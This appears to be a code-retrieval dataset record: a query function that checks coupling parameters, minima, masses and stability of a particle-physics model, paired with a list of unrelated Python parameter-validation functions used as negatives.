def CheckCouplings(params, verbose=False): l1 = params[0] l2 = params[1] l3 = params[2] gx = params[3] m = model_2f(l1, l2, l3, y_t_interpol(np.log(v/mz)), gx) minima, success = m.findMinimum() #the boolean success is added because we cannot trust the minima if numpy.optimize.minimize has failed if not verbose: tolvevh = 2.0 tolmh = 2.0 condition0 = abs(minima-v) < tolvevh if condition0.any() and success: ddVtot = nd.Hessian(m.Vtot_0T) hess = ddVtot(minima) masses = np.linalg.eigvalsh(hess) #computes masses... positive_condition = masses > 0 if(positive_condition.all()): #we will only check them IF they are positive masses = np.sqrt(np.abs(masses)) condition1 = abs(masses-mh) < tolmh if condition1.any(): stability = m.CheckStability() #we check the stability of the model f = open(file_name, 'a') line0 = str(l1)+' '+str(l2)+' '+str(l3)+' '+str(gx)+' '+str(minima[0])+' '+str(minima[1])+' '+str(masses[0])+' '+str(masses[1]) #we print everything line0 = line0 + ' '+str(stability) f.write(line0+'\n') f.write('-'*90+'\n') f.close() else: """ Just checks the minima of the model m, the masses of the particles and whether it is stable or not Output: prints the information """ print "Minimum at T = 0.0: ", minima, success print "Masses: " ddVtot = nd.Hessian(m.Vtot_0T) hess = ddVtot(minima) print np.sqrt(np.linalg.eigvalsh(hess)) print 'Stable: ', m.CheckStability()==1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def matches(self, aModel):\n\n params_bis = list(map(aModel.string_to_param,self.grid_params))\n for param1, param2 in zip(self.params, params_bis):\n if (abs(param1/param2 - 1.0) > eps): return False\n return True", "def check_params(self, model_params):\n\n comm = self.comm\n for param, policy in self.noise_policy.items():\n low_bound, up_bound, absify, low_bound_diagonal = policy\n new_pvalue = model_params[param]\n if np.isscalar(new_pvalue): # Param to be noisified is scalar\n if comm.rank == 0:\n if new_pvalue < low_bound:\n print(\"check_params: Reset lower bound of %s\" % param)\n new_pvalue = low_bound\n if new_pvalue >= up_bound:\n print(\"check_params: Reset upper bound of %s\" % param)\n new_pvalue = up_bound\n if absify:\n print(\"check_params: Taking abs of %s\" % param)\n new_pvalue = np.abs(new_pvalue)\n if (\n low_bound_diagonal is not None\n ): # when using isotropic instead of full matrix\n if new_pvalue < low_bound_diagonal:\n print(\"check_params: Reset lower bound of %s (diagonal)\" % param)\n new_pvalue = low_bound_diagonal\n new_pvalue = comm.bcast(new_pvalue)\n else:\n if comm.rank == 0:\n if (new_pvalue < low_bound).any():\n print(\"check_params: Reset lower bound of %s\" % param)\n if (new_pvalue >= up_bound).any():\n print(\"check_params: Reset upper bound of %s\" % param)\n new_pvalue = np.maximum(low_bound, new_pvalue)\n new_pvalue = np.minimum(up_bound, new_pvalue)\n if absify:\n print(\"check_params: Taking abs of %s\" % param)\n new_pvalue = np.abs(new_pvalue)\n if low_bound_diagonal is not None:\n mask = np.diag(new_pvalue) < low_bound_diagonal\n if mask.any():\n print(\"check_params: Reset lower bound of %s (diagonal)\" % param)\n new_pvalue[np.diag(mask)] = low_bound_diagonal\n comm.Bcast([new_pvalue, MPI.DOUBLE])\n model_params[param] = new_pvalue\n\n return model_params", "def _check_params(self):\n\t\tstrange_param_helper = False\n\t\tfor param in self.params:\n\t\t\n\t\t\t# It could be that the param encapsulates several values (e.g., \"FLUX_RADIUS(10)\")\n\t\t\t# So we have to dissect this\n\t\t\tmatch = re.compile(\"(\\w*)\\(\\d*\\)\").match(param)\n\t\t\tif match:\n\t\t\t\tcleanparam = match.group(1)\n\t\t\telse:\n\t\t\t\tcleanparam = param\n\t\t\t\t\n\t\t\tif cleanparam not in self.fullparamlist:\n\t\t\t\tlogger.warning(\"Parameter '%s' seems strange and might be unknown to SExtractor\" \\\n % (param))\n\t\t\t\tstrange_param_helper = True\n\t\t\t\t\n\t\tif strange_param_helper:\n\t\t\tlogger.warning(\"Known parameters are: %s\" % (self.fullparamtxt))", "def check_grid_params(params_full, source, precision=6, kgrid=None):\n source = grid_strings.source_shorthand(source=source)\n n_models = len(params_full['x'])\n any_matches = None\n\n if kgrid is None:\n print('No kgrid provided. Loading:')\n kgrid = grid_analyser.Kgrid(source=source, load_lc=False,\n powerfits=False, verbose=False)\n for i in range(n_models):\n model_param = {}\n\n for key, vals in params_full.items():\n val_rounded = float(f'{vals[i]:.{precision}f}')\n model_param[key] = val_rounded\n\n model = kgrid.get_params(params=model_param)\n\n if len(model) == 0:\n any_matches = False\n else:\n print('WARNING: a model with the following params already exists:')\n for var, v in model_param.items():\n print(f'{var} = {v:.3f}')\n any_matches = True\n break\n\n return any_matches", "def check_params(self, model_params):\n return model_params", "def check_param(self):\n if scipy.ndim(self.param['initial_heading'].shape) > 1:\n raise(ValueError, 'initial_heading must have ndim=1')\n\n equal_shape_list = ['x_start_position','y_start_position','flight_speed','release_time']\n for item in equal_shape_list:\n if self.param[item].shape != self.param['initial_heading'].shape:\n raise(ValueError, '{0}.shape must equal initial_heading.shape'.format(item))", "def checkParamsError(self):\n # check if parameter combinations match with the simulation filename.\n for i, f in enumerate(self.yadeDataFiles):\n # get the file name fore the suffix\n f = f.split('.' + f.split('.')[-1])[0]\n # get parameters from the remaining string\n paramsString = f.split('_')[-self.numParams:]\n # element wise comparison of the parameter vector\n if not (np.abs((np.float64(paramsString) - self.getSmcSamples()[-1][i])\n / self.getSmcSamples()[-1][i] < 1e-10).all()):\n raise RuntimeError(\n \"Parameters \" + \", \".join(\n [\"%s\" % v for v in self.getSmcSamples()[-1][i]]) + \" do not match with the data file name \" + f)", "def _is_parameters_ok(self):\n if self.maxresult is None:\n raise MissingParameterException(\"Arithmetics neuron needs maxresult parameter.\")\n\n return True", "def check_state(self):\n if not self.__is_valid:\n raise GmParamError(\"Parameters of the model has not been\"\\\n \"set yet, please set them using self.set_param()\")\n\n # Check condition number for cov matrix\n if self.mode == 'diag':\n tinfo = N.finfo(self.va.dtype)\n if N.any(self.va < tinfo.eps):\n raise GmParamError(\"variances are singular\")\n elif self.mode == 'full':\n try:\n d = self.d\n for i in range(self.k):\n N.linalg.cholesky(self.va[i*d:i*d+d, :])\n except N.linalg.LinAlgError:\n raise GmParamError(\"matrix %d is singular \" % i)\n\n else:\n raise GmParamError(\"Unknown mode\")\n\n return True", "def check_PLSR_input():\r\n\r\n RM.check_if_ndim_array(model_data, 3, 'Model data')\r\n RM.check_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the solution matrix',\r\n 'the number of input parameters')\r\n RM.warn_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1] + 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the solution matrix')\r\n RM.check_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1] - 1,\r\n 'The number of output parameters in the solution matrix',\r\n 'the number of output parameters')\r\n RM.warn_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1],\r\n 'The number of output parameters',\r\n 'the number of output parameters in the solution matrix')\r\n\r\n # Check if the additional data is correct\r", "def input_check(self):\n\n if self.species == 'He': assert self.line_model == 'voigt'\n n_upper_range, e_dens_range, temp_range, b_field_range = get_param_ranges(self.line_model)\n\n if np.isnan(n_upper_range).sum() <= 1:\n assert (self.n_upper in range(n_upper_range[0], n_upper_range[1]))\n if np.isnan(e_dens_range).sum() <= 1:\n assert (e_dens_range[0] <= self.e_dens <= e_dens_range[1])\n if np.isnan(temp_range).sum() <= 1:\n assert (temp_range[0] <= self.temp <= temp_range[1])\n if np.isnan(b_field_range).sum() <= 1:\n assert (b_field_range[0] <= self.b_field <= b_field_range[1])", "def check_params(self):\r\n \r\n # TODO: More cases?\r\n\r\n if self.N <= 0:\r\n print('Bad Parameter: N')\r\n \r\n if self.Ha_tally <= 0 or self.Ha_tally > self.N:\r\n print('Bad Parameter: Reported winner tally')\r\n \r\n if len(self.round_sched) < 1 or not self.check_inc_sched(self.round_sched):\r\n print('Bad Parameter: Round Schedule')\r\n\r\n if self.alpha <= 0 or self.alpha >= .5:\r\n print('Bad Parameter: Alpha')", "def check_additional_input():\r\n\r\n # Check if the cluster center input is correct\r\n RM.check_if_matrix(clust_cent, 'The cluster centers')\r\n RM.warn_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the cluster centers',\r\n 'the number of input parameters - 1')\r\n RM.check_if_bigger(clust_cent.shape[1], meta_model.get_in_par_means().shape[1] - 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the cluster centers')\r\n\r\n bounds = meta_model.get_in_par_intervals()\r\n\r\n for j in range(clust_cent.shape[0]):\r\n for i in range(bounds.shape[0]):\r\n RM.check_if_in_interval(bounds[i], clust_cent[j, i], i, ' In cluster center %x, the value')\r\n\r\n def check_PLSR_input():\r\n \"\"\" Checks model data of PLSR\r\n\r\n :return: Checks model data of PLSR\r\n \"\"\"\r\n\r\n RM.check_if_ndim_array(model_data, 3, 'Model data')\r\n RM.check_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1],\r\n 'The number of input parameters in the solution matrix',\r\n 'the number of input parameters')\r\n RM.warn_if_bigger(model_data.shape[1], meta_model.get_in_par_means().shape[1] + 1,\r\n 'The number of input parameters',\r\n 'the number of input parameters in the solution matrix')\r\n RM.check_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1] - 1,\r\n 'The number of output parameters in the solution matrix',\r\n 'the number of output parameters')\r\n RM.warn_if_bigger(model_data.shape[2], meta_model.get_out_par_means().shape[1],\r\n 'The number of output parameters',\r\n 'the number of output parameters in the solution matrix')\r\n\r\n # Check if the additional data is correct\r\n\r\n if meta_model.get_type() == 'PLSR': # Additional check-up for PLSR\r\n check_PLSR_input()\r\n\r\n elif meta_model.get_type() == 'DLU': # Additional check-up for DLU\r\n raise TypeError('This part is not implemented yet')\r\n\r\n # if not isinstance(model_data, np.ndarray):\r\n # raise TypeError('The cluster input and output data is not stored in a multidimensional array')\r\n #\r\n # for clust_data in model_data:\r\n #\r\n # if not isinstance(clust_data[0], np.matrix) or not isinstance(clust_data[1], np.matrix):\r\n # raise TypeError('One of the input or output databases is not a matrix')\r\n #\r\n # if clust_data[0].shape[1] > meta_model.get_in_par_means().shape[1]:\r\n # warnings.warn('The number of input parameters for the input database of the clusters is bigger '\r\n # 'than the actual number of input parameters')\r\n #\r\n # elif clust_data[0].shape[1] < meta_model.get_in_par_means().shape[1]:\r\n # raise TypeError('The number of input parameters for the input database of the clusters is '\r\n # 'smaller than the actual numbers of input parameters')\r\n #\r\n # if clust_data[1].shape[1] > meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of the clusters is '\r\n # 'bigger than the actual number of output parameters')\r\n #\r\n # elif clust_data[1].shape[1] < meta_model.get_out_par_means().shape[1]:\r\n # raise TypeError('The number of output parameters for the output database of the clusters is '\r\n # 'smaller than the actual numbers of output parameters')\r\n #\r\n # if clust_data[0].shape[0] != clust_data[1].shape[0]:\r\n # raise TypeError('The number rows in the input and output database differ from each other')\r\n\r\n else: # No check-up is done when the meta-model is an unknown version\r\n warnings.warn('The additional cluster data can not be checked, for this kind of meta-model')\r\n\r\n RM.check_if_same_size(clust_cent.shape[0], model_data.shape[0],\r\n 'The number of clusters according to the cluster centers',\r\n 'The number of clusters according to the model_data')", "def check_params(params):\n assert 'split' in params.keys(\n ), 'Params must include split (train, val, or test).'\n\n required = ['batch_size', 'im_shape']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def check_gmm_param(w, mu, va):\n \n # Check that w is valid\n if not len(w.shape) == 1:\n raise GmParamError('weight should be a rank 1 array')\n\n if N.fabs(N.sum(w) - 1) > misc.MAX_DBL_DEV:\n raise GmParamError('weight does not sum to 1')\n \n # Check that mean and va have the same number of components\n k = len(w)\n\n if N.ndim(mu) < 2:\n msg = \"mu should be a K,d matrix, and a row vector if only 1 comp\"\n raise GmParamError(msg)\n if N.ndim(va) < 2:\n msg = \"\"\"va should be a K,d / K *d, d matrix, and a row vector if\n only 1 diag comp\"\"\"\n raise GmParamError(msg)\n\n (km, d) = mu.shape\n (ka, da) = va.shape\n\n if not k == km:\n msg = \"not same number of component in mean and weights\"\n raise GmParamError(msg)\n\n if not d == da:\n msg = \"not same number of dimensions in mean and variances\"\n raise GmParamError(msg)\n\n if km == ka:\n mode = 'diag'\n else:\n mode = 'full'\n if not ka == km*d:\n msg = \"not same number of dimensions in mean and variances\"\n raise GmParamError(msg)\n \n return k, d, mode", "def check_params(params):\n assert 'split' in params.keys(\n ), 'Params must include split (train, val, or test).'\n\n required = ['batch_size', 'root', 'im_shape']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def check_data(self):\n\n missing_params = {}\n flag = False\n\n missing_params['general'] = {}\n for name, param in self.params.items():\n if not param.check():\n missing_params['general'][name] = param.get_description()\n flag = True\n\n for component, comp_obj in self.components.items():\n missing_params[component], flag_comp = comp_obj.check_data()\n\n # Assign empty component parameters that have a general version:\n empty_general_params = set(missing_params[component]).intersection(\n set(self.params))\n for param in empty_general_params:\n comp_obj.change_param_object(param, self.params[param])\n del missing_params[component][param]\n\n if missing_params[component]:\n flag = True\n\n if flag:\n raise Exception('Following parameters are missing:\\n{}'\n .format(\n self._print_params(missing_params, disp=False)))\n\n return True", "def validate_params(self, params: Scenario) -> bool:\n valid = True\n # Make sure all needed parameters were provided\n valid = valid and \"R\" in params\n valid = valid and \"L\" in params\n\n # Make sure all parameters are physically valid\n valid = valid and params[\"R\"] > 0\n valid = valid and params[\"L\"] > 0\n\n return valid", "def _check_parameters_support(self, parameters=()):\n for parameter in parameters:\n assert parameter in self._supported, \"Estimation %s is not implemented yet\" % parameter", "def check(self, parameters):\n if np.any(parameters < self._lower):\n return False\n if np.any(parameters > self._upper):\n return False\n return True", "def checkUserInput(self, stguess):\n lines = stguess.splitlines()\n if len(lines) == 0:\n return False\n err = \"\"\n for l, line in enumerate(lines):\n items = line.split(',')\n np = len(items)\n if np != 4 and np != 6:\n err = \"Wrong number of parameters\"\n else:\n for p in range(0, np):\n val = items[p].strip()\n if p == 0:\n if not val in ['G', 'L', 'P', 'AG', 'AL', 'AP']:\n err = \"Unknown peak type\"\n else:\n if not isNumber(val):\n err = \"Parameter {0} in not numeric\".format(p+1)\n break\n v = float(val)\n if p == 1: # xm\n if v < self.data[0].min() or v > self.data[0].max():\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 2: # amp\n if v < self.data[1].min() * 1.1 \\\n or v > self.data[1].max() * 1.1:\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 3: # w\n xspan = getSpan(self.data[0])\n if v < xspan / self.npt or v > (xspan / 2):\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 4: # asym\n maxasym = 1000 / self.data[0].max()\n if v < -maxasym or v > maxasym:\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if p == 5: # Lfrac\n if v < 0.0 or v > 1.0:\n err = \"Parameter {0} out of range\".format(p+1)\n break\n if err:\n break\n if err:\n errmsg = \"Error in peak {0}:\\n{1}\".format(l+1, err)\n QtWidgets.QMessageBox.warning(self.parent, self.title, errmsg)\n return False\n return True", "def check_hparams(self, hparams):\n error_messages = []\n\n # Check global params.\n feature_names = hparams.get_feature_names()\n global_values, per_feature_values = hparams.get_global_and_feature_params(\n ['num_keypoints', 'missing_input_value',\n 'missing_output_value'], feature_names)\n global_param_error_messages = self._check_param_configuration(\n *global_values)\n if global_param_error_messages:\n error_messages.append('Error message for global param:')\n error_messages += global_param_error_messages\n\n # Check per feature params. hparams.get_feature_names() will only return\n # feature names that sets per feature parameters.\n for feature_idx in range(len(per_feature_values)):\n per_feature_param_error_messages = self._check_param_configuration(\n *per_feature_values[feature_idx])\n if per_feature_param_error_messages:\n error_messages.append(\n 'Error message for %s feature param:' % feature_names[feature_idx])\n error_messages += per_feature_param_error_messages\n\n if error_messages:\n raise ValueError(\n 'Hyperparameter configuration cannot be used in the calibrated '\n 'lattice estimator. Error messages report the issue per feature, but'\n ' the parameter may be inherited from global parameter.\\nDetailed '\n 'error messsages\\n%s' % '\\n'.join(error_messages))", "def check(self):\n if 'MISFIT' not in PAR:\n setattr(PAR, 'MISFIT', 'Waveform')\n\n if 'CHANNELS' not in PAR:\n raise ParameterError(PAR, 'CHANNELS')\n\n if 'READER' not in PAR:\n raise ParameterError(PAR, 'READER')\n\n if 'WRITER' not in PAR:\n setattr(PAR, 'WRITER', PAR.READER)\n\n if 'NORMALIZE' not in PAR:\n setattr(PAR, 'NORMALIZE', True)\n\n # mute settings\n if 'MUTE' not in PAR:\n setattr(PAR, 'MUTE', False)\n\n if 'MUTESLOPE' not in PAR:\n setattr(PAR, 'MUTESLOPE', 0.)\n\n if 'MUTECONST' not in PAR:\n setattr(PAR, 'MUTECONST', 0.)\n\n # filter settings\n if 'BANDPASS' not in PAR:\n setattr(PAR, 'BANDPASS', False)\n\n if 'FREQLO' not in PAR:\n setattr(PAR, 'FREQLO', 0.)\n\n if 'FREQHI' not in PAR:\n setattr(PAR, 'FREQHI', 0.)\n\n # assertions\n if PAR.READER not in dir(readers):\n print msg.ReaderError\n raise ParameterError()\n\n if PAR.WRITER not in dir(writers):\n print msg.WriterError\n raise ParameterError()", "def checkParams(needle,haystack,selName,het,firstOnly):\n\t# check Needle\n\tif len(needle)==0 or type(needle)!=types.StringType:\n\t\tprint \"Error: Please provide a string 'needle' to search for.\"\n\t\tprint \"Error: For help type 'help motifFinder'.\"\n\t\treturn False\n \n\t# check Haystack\n\tif len(haystack)==0 or type(haystack)!=types.StringType:\n\t\tprint \"Error: Please provide valid PyMOL object or selection name\"\n\t\tprint \"Error: in which to search.\"\n\t\tprint \"Error: For help type 'help motifFinder'.\"\n\t\treturn False\n \n\t# check het\n\ttry:\n\t\thet = bool(int(het))\n\texcept ValueError:\n\t\tprint \"Error: The 'het' parameter was not 0 or 1.\"\n\t\treturn False\n \n\t# check first Only\n\ttry:\n\t\tfirstOnly = bool(int(het))\n\texcept ValueError:\n\t\tprint \"Error: The 'firstOnly' parameter was not 0 or 1.\"\n\t\treturn False\n \n\t# check selName\n\tif type(selName)!=(types.StringType) and type(selName)!=(types.NoneType):\n\t\tprint \"Error: selName was not a string.\"\n\t\treturn False\n \n\treturn True", "def constrain_pars(model_info, pars):\n name = model_info['id']\n # if it is a product model, then just look at the form factor since\n # none of the structure factors need any constraints.\n if '*' in name:\n name = name.split('*')[0]\n\n if name == 'capped_cylinder' and pars['cap_radius'] < pars['radius']:\n pars['radius'], pars['cap_radius'] = pars['cap_radius'], pars['radius']\n if name == 'barbell' and pars['bell_radius'] < pars['radius']:\n pars['radius'], pars['bell_radius'] = pars['bell_radius'], pars['radius']\n\n # Limit guinier to an Rg such that Iq > 1e-30 (single precision cutoff)\n if name == 'guinier':\n #q_max = 0.2 # mid q maximum\n q_max = 1.0 # high q maximum\n rg_max = np.sqrt(90*np.log(10) + 3*np.log(pars['scale']))/q_max\n pars['rg'] = min(pars['rg'], rg_max)\n\n if name == 'rpa':\n # Make sure phi sums to 1.0\n if pars['case_num'] < 2:\n pars['Phia'] = 0.\n pars['Phib'] = 0.\n elif pars['case_num'] < 5:\n pars['Phia'] = 0.\n total = sum(pars['Phi'+c] for c in 'abcd')\n for c in 'abcd':\n pars['Phi'+c] /= total", "def _check_parameters(self, ep, params):\n\n any_group_satisfied = False\n for group in ep.REQUIRED:\n if all(required_param in params for required_param in group):\n any_group_satisfied = True\n\n if not any_group_satisfied:\n raise ValueError(f\"Got parameters {params}, expected one of {ep.REQUIRED}\")\n\n for key in params:\n if key not in ep.POSSIBLE:\n raise ValueError(f\"Got {key}, expected one of {ep.POSSIBLE}\")", "def checkParameters(self):\n EDVerbose.DEBUG(\"EDPluginExecGnomv0_1.checkParameters\")\n self.checkMandatoryParameters(self.dataInput, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.experimentalDataQ, \"Scattering vector values are missing\")\n self.checkMandatoryParameters(self.dataInput.experimentalDataValues, \"Experimental intensity values are missing\")", "def check_parameters(self, parameter_set: CHARMMParameterFile) -> bool:\n return parameter_set.check_parameters(self)", "def _check_params(self):\n pass", "def check_valid_params(cls, **user_params):\n # Check that the appropriate number of params are provided\n if not all(key in user_params for key in cls.param.keys()):\n raise ValueError(f\"Missing parameter! Expected {cls.param.keys()} but was given {user_params.keys()}\")\n\n # Check parameter units and values\n for (key, allowed_params), user_param in zip(cls.param.items(), user_params.values()):\n\n # If both have units, check that the user param value is valid. If valid, continue. Else, error\n if type(user_param) == Quantity and type(allowed_params) == Quantity:\n if get_physical_type(user_param.unit) != get_physical_type(allowed_params.unit):\n raise UnitTypeError(f\"Incorrect units {user_param.unit} provided for parameter {key}, \"\n f\"expected {allowed_params.unit}\")\n\n elif np.isin(user_param.to(allowed_params.unit).value, allowed_params.value):\n continue\n else:\n raise ValueError(f\"Invalid value '{user_param}' provided for parameter {key}, \"\n f\"allowed value(s): {allowed_params}\")\n\n # If one only one has units, then error\n elif (type(user_param) == Quantity) ^ (type(allowed_params) == Quantity):\n # User param has units, model param is unitless\n if type(user_param) == Quantity:\n raise ValueError(f\"Invalid units {user_param.unit} for parameter {key} provided, expected None\")\n else:\n raise ValueError(f\"Missing units for parameter {key}, expected {allowed_params.unit}\")\n\n # Check that unitless user param value is valid. If valid, continue. Else, Error\n elif user_param in allowed_params:\n continue\n else:\n raise ValueError(f\"Invalid value '{user_param}' provided for parameter {key}, \"\n f\"allowed value(s): {allowed_params}\")\n\n # Check Combinations (Logic lives inside model subclasses under model.isvalid_param_combo)\n if user_params not in cls.get_param_combinations():\n raise ValueError(\n f\"Invalid parameter combination. See {cls.__class__.__name__}.get_param_combinations() for a \"\n \"list of allowed parameter combinations.\")", "def _check_whether_has_params(self, params) -> bool:\n\n if params:\n return True\n return False", "def checkUserInput(self):\n prm = []\n err = \"\"\n guess = self.text.text()\n items = str(guess).split(',')\n if len(items) != 2:\n err = \"Two parameters must be given\"\n else:\n for i in range(0, len(items)):\n val = items[i].strip()\n if not isNumber(val):\n err = \"Parameter {0} is not numeric\".format(i + 1)\n break\n if float(val) < 0.0:\n err = \"Parameter {0} is negative\".format(i + 1)\n break\n val = float(val)\n if i == 0 and val > self.yspan:\n err = \"minHeight is too large\"\n break\n if i == 1:\n if val < self.xspan/self.npt or val > self.xspan/2:\n err = \"minWidth is too large\"\n break\n prm.append(val)\n if err:\n errmsg = \"Incorrect input:\\n{0}\".format(err)\n QtWidgets.QMessageBox.warning(self, self.title, errmsg)\n return False\n\n # Store parameters values in global variables for the next call\n global lastfilename, lastmph, lastmpw\n lastfilename = self.pltw.filename\n self.mph = lastmph = prm[0]\n self.mpw = lastmpw = prm[1]\n return True", "def param_check(self, params, func_name):\n help = None\n fun = getattr(self, func_name, None)\n if fun and getattr(fun, '__cement_meta__', None):\n help = fun.__cement_meta__['help']\n\n for p in params:\n param = getattr(self.app.pargs, p, None)\n if param is None:\n log.print_err(\"param {} miss, see help:\".format(p))\n if help:\n print(help)\n return False\n return True", "def check_params(params):\n\n required = ['gtsrb_train_root', 'gtsrb_test_root', 'batch_size']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def check_params(self):\n raise NotImplementedError", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def validate(cls, params):\n if np.isnan(params['loc']).sum():\n raise InvalidParamsError(\n \"Real location (mu) values are required for\"\n \" lognormal uncertainties.\"\n )\n if np.isnan(params['scale']).sum() or (params['scale'] <= 0).sum():\n raise InvalidParamsError(\n \"Real, positive scale (sigma) values are required for\"\n \" lognormal uncertainties.\"\n )", "def _validate_array_params(array_params):\n if isinstance(array_params, dict):\n # Shallow check; make sure each antenna position is a 3-vector.\n if all(len(pos) == 3 for pos in array_params.values()):\n return True\n elif isinstance(array_params, str):\n # Shallow check; just make sure the file exists.\n return os.path.exists(array_params)\n else:\n raise TypeError(\"Array layout must be a dictionary or path to a layout csv.\")", "def getIsValidParameters(self):\n isVolumValid = self.volume > 0\n if not isVolumValid:\n return isVolumValid, 'Invalid input volume'\n\n if not self.lowerLimitPressureInspiratory <= self.pressureInspiratory <= self.higherLimitPressureInspiratory:\n return False, f'Selected inspiratory value must be between {self.lowerLimitPressureInspiratory} cmH20 ' \\\n f'and {self.higherLimitPressureInspiratory} cmH2O.'\n\n if not self.lowerLimitPressureExpiratory <= self.pressureExpiratory <= self.higherLimitPressureExpiratory:\n return False, f'Selected expiratory value must be between {self.lowerLimitPressureExpiratory} cmH20 ' \\\n f'and {self.higherLimitPressureExpiratory} cmH2O.'\n\n return self._getIsValidParameters()", "def _check_difficulty_parameters(difficulty, model):\n max_value = difficulty.shape[1] + 1\n\n if model in [\"grm\"]:\n # Check that all the arguments are sorted\n if not np.all(difficulty[:, :-1] < difficulty[:, 1:]):\n raise AssertionError(\"Difficulty Parameters must be \"\n \"in ascending order\")\n\n elif model in ['gum']:\n # Parameters must be odd\n if max_value % 2:\n raise AssertionError(\"There must be an odd number of \"\n \"difficulty parameters\")\n\n # Parameters must be skew-symmetric about the center point\n middle_index = (difficulty.shape[1] - 1) // 2\n adjusted_difficulty = (difficulty -\n difficulty[:, middle_index][:, None])\n\n if not np.all(np.abs(adjusted_difficulty.sum(axis=1)) < 1e-7):\n raise AssertionError(\"Difficulty Parameters must be \"\n \"symmetric about offset\")\n\n max_value = middle_index + 1\n\n return max_value", "def validate_parameters(self):\n\n flag = True\n warnings = \"\"\n # Check radius\n r = self.parameters.get('r', 0)\n if type(r) not in [int, float]:\n flag = False\n warnings += \"Radius r must be a float value\\n\"\n else:\n if r <= 0:\n flag = False\n warnings += \"Radius r must be higher than 0\\n\"\n # Check if is full penetrating\n op = self.parameters.get('full', False)\n\n if not op:\n # Check observation well length\n if 'd' in self.parameters and 'l' in self.parameters:\n d = self.parameters.get('d', -1)\n l = self.parameters.get('l', -1)\n if type(l) not in [int, float]:\n flag = False\n warnings += \"Depth of well bottom must be a float value\\n\"\n else:\n if l < 0:\n flag = False\n warnings += \"Depth l must be higher than 0\\n\"\n if type(d) not in [int, float]:\n flag = False\n warnings += \"Depth of well screen must be a float value\\n\"\n else:\n if d < 0 or d > l:\n flag = False\n warnings += \"Depth d must be in range 0 <= d <= l\\n\"\n # Check piezometer depth\n elif 'z' in self.parameters:\n z = self.parameters.get('z', -1)\n if type(z) not in [int, float]:\n flag = False\n warnings += \"Depth of piezometer must be a float value\\n\"\n else:\n if z < 0:\n flag = False\n warnings += \"Depth z must be higher than 0\\n\"\n else:\n flag = False\n warnings += \"Well don't contain well depth attributes\\n\"\n return(flag, warnings) # End Function", "def validate_params(cls, args):\n if not (len(args) == 3 or len(args) == 5 or len(args) == 7):\n sys.exit(\n 'Execute o script passando o caminho do diretório das'\n ' imagens, ou apenas o path de uma imagem e decida se'\n ' deseja mover ou não'\n )\n args_dict = cls.__make_params(args)\n keys_args_set = set(args_dict.keys())\n if keys_args_set.difference(KEYS_DEFAULT_AS_SET) != set():\n sys.exit(\n 'Verifique a passagem de parâmetros.'\n ' Foi encontrado parâmetros desconhecidos.'\n )\n\n return cls.__check_args(args_dict)", "def check_parameters(args):\n inference_algorithm = args[\"inference_algorithm\"]\n combination_algorithm = args[\"combination_algorithm\"]\n measures = args[\"measures\"]\n prior = args[\"prior\"]\n inverse_dynamics_model_checkpoint = args[\"inverse_dynamics_model_checkpoint\"]\n\n check_in(\n \"inference_algorithm\",\n inference_algorithm,\n [\n \"rlsp\",\n \"latent_rlsp\",\n \"latent_rlsp_ablation\",\n \"sampling\",\n \"deviation\",\n \"reachability\",\n \"spec\",\n ],\n )\n check_in(\n \"combination_algorithm\",\n combination_algorithm,\n (\"additive\", \"bayesian\", \"latent_vi\", \"latent_ppo\"),\n )\n check_in(\"prior\", prior, [\"gaussian\", \"laplace\", \"uniform\"])\n\n for i, measure in enumerate(measures):\n check_in(\n \"measure {}\".format(i),\n measure,\n [\"inferred_reward\", \"true_reward\", \"final_reward\", \"model_training_error\"],\n )\n\n if combination_algorithm == \"bayesian\":\n check_in(\"inference_algorithm\", inference_algorithm, [\"rlsp\", \"sampling\"])\n\n if inference_algorithm == \"latent_rlsp\":\n check_not_none(\n \"inverse_dynamics_model_checkpoint\", inverse_dynamics_model_checkpoint\n )\n\n if (\n combination_algorithm.startswith(\"latent\")\n and inference_algorithm != \"latent_rlsp\"\n ):\n raise ValueError(\n \"combination_algorithm 'latent' should only be used with 'latent_rlsp'\"\n )", "def Check(self, parameters):", "def checkParameters(self):\n self.DEBUG(\"EDPluginExecDatGnomv1_0.checkParameters\")\n self.checkMandatoryParameters(self.dataInput, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.inputCurve, \"No input Curve file provided\")", "def _check_param(grads, images, kernel_name, align_corners, half_pixel_centers):\n if half_pixel_centers:\n if align_corners:\n raise RuntimeError(\"If half_pixel_centers is True, \"\n \"align_corners must be False.\")\n grads_shape = grads.get(\"shape\")\n grads_dtype = grads.get(\"dtype\")\n images_shape = images.get(\"shape\")\n images_dtype = images.get(\"dtype\")\n data_limit = ((1 << 31) - 1) // (4 if images_dtype == \"float32\" else 2)\n util.check_kernel_name(kernel_name)\n util.check_shape_rule(grads_shape)\n util.check_shape_rule(images_shape)\n util.check_shape_size(grads_shape, data_limit)\n util.check_shape_size(images_shape, data_limit)\n check_list_grads = (\"float32\")\n check_list_images = (\"float32\")\n util.check_dtype_rule(grads_dtype.lower(), check_list_grads)\n util.check_dtype_rule(images_dtype.lower(), check_list_images)", "def _check_parameter_unpacking(self, method:Callable, model_parameters:dict) -> bool:\r\n\r\n 